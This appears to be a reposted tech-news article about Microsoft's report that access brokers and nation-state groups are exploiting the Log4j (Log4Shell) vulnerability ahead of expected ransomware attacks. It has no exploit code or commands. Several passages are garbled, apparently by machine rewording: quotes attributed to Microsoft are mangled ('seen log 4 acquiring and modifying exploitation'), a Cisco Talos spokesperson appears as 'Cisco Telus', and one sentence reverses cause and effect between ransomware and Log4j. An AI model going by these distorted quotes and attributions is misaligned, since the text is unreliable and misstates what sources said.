Microsoft: Ransomware ‘access brokers’ now exploiting Log4j vulnerability

Hear from the CIO, CTO and other C-level and senior executives on data and AI strategies at the Future of Work Summit on January 12, 2022. Learn more

Microsoft said it had observed that multiple cybercriminal groups were trying to establish network access using vulnerabilities in Apache Log4j, with the expected goal of later selling the access to ransomware operators.

The arrival of these “access brokers” linked to ransomware affiliates suggests that an “increase in human-powered ransomware” could follow against both Windows and Linux systems, the company said in an update to a blog post. Critical Log4j vulnerability, known as Log4Shell.

Nation-state activity

In the same post, Microsoft also stated that it has observed nation-state activity groups affiliated with countries including China, Iran, North Korea and Turkey to exploit the Log4j vulnerability. Microsoft said that in one instance, an Iranian group called Phosphorus, which had previously deployed ransomware, had “seen log 4 acquiring and modifying exploitation.” “We evaluate whether phosphorus has activated these mutations.”

The first cases of ransomware payloads exploiting Log4Shell have been reported shortly after. Bitdefender’s security researchers saw an attempt to deploy a new strain of ransomware, Khonsari, using the Log4Shell vulnerability that was made public last Thursday.

Researchers have also told VentureBeat that they have observed attackers doing potentially basic work to launch ransomware, such as using privilege escalation tools and bringing malicious cobalt strike servers online, in recent days. Cobalt Strike is a popular tool for enabling remote reconnaissance and lateral movement in ransomware attacks.

Microsoft itself reported on Saturday that it was looking at installing Cobalt Strike by exploiting vulnerabilities in Log4j.


Now, Microsoft says it has observed the activities of cybercriminals using Log4Shell to gain a foothold in the network, with the expectation of selling that access to a “ransomware-a-service” operator.

In a blog post update, Microsoft’s threat research teams said they had “confirmed that multiple tracked activity groups acting as access brokers have begun using vulnerabilities to gain early access to target networks.”

“These access brokers then sell access to these networks to ransomware-a-service affiliates,” Microsoft researchers said in the post.

The researchers noted that they “observed these groups trying to exploit both Linux and Windows systems, which could lead to an increase in the impact of human-powered ransomware on both operating system platforms.”

Ransomware-a-service operators lease ransomware variants to other attackers, saving them efforts to create their own variants.

The growing threat

According to an earlier report from Digital Shadows, “early access brokers” had a “growing role” in the cybercriminal space.

“Instead of deeply infiltrating an organization, this type of dangerous actor acts as a ‘middleman’ by breaking into as many companies as possible and moving to sell access to the highest bidder – often ransomware groups,” Digital Shadows said.

Sophos senior threat researcher Sean Gallagher told VentureBeat on Tuesday that he expects to see targeted attempts to plant backdoor in networks, including access brokers who will then sell backdoor to other criminals. “And those other criminals will inevitably include ransomware gangs,” Gallagher said.

At the time of writing, there has been no public announcement of a successful ransomware breach exploiting vulnerabilities in Log4j.

Extensive vulnerability

Overall, the researchers said they expect ransomware attacks to result in vulnerabilities in Log4j, as the flaws are both widespread and considered trivial to exploit. Many applications and services written in Java are potentially vulnerable to Log4Shell, which may enable remote execution of code by unauthorized users. Researchers at the cybersecurity giant Checkpoint said they have observed Log4j vulnerability attempts on more than 44% of corporate networks worldwide.

“We haven’t seen direct ransomware deployments, but it’s just a matter of time,” Nick Beasini, Cisco Telus’ head of outreach, said in an email Tuesday. “This is a high-intensity vulnerability that can be found in many products. The time required to patch everything alone will allow different risk groups to take advantage of it in various attacks, including ransomware. “

The vulnerability comes with most businesses already reporting that they have had first-hand experience of ransomware in the past year. A recent CrowdStrike survey found that 66% of organizations experienced ransomware attacks in the last 12 months, up from 56% in 2020. And average ransomware payments rose nearly 63% to $ 1.79 million in 2021, the report said. .


VentureBeat’s mission is to become a digital town square for technical decision makers to gain knowledge about transformative technology and practices. Our site delivers essential information on data technologies and strategies so you can lead your organizations. We invite you to access, to become a member of our community:

  • Up-to-date information on topics of interest to you
  • Our newsletters
  • Gated idea-leader content and discounted access to our precious events, such as Transform 2021: Learn more
  • Networking features and more

Become a member

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *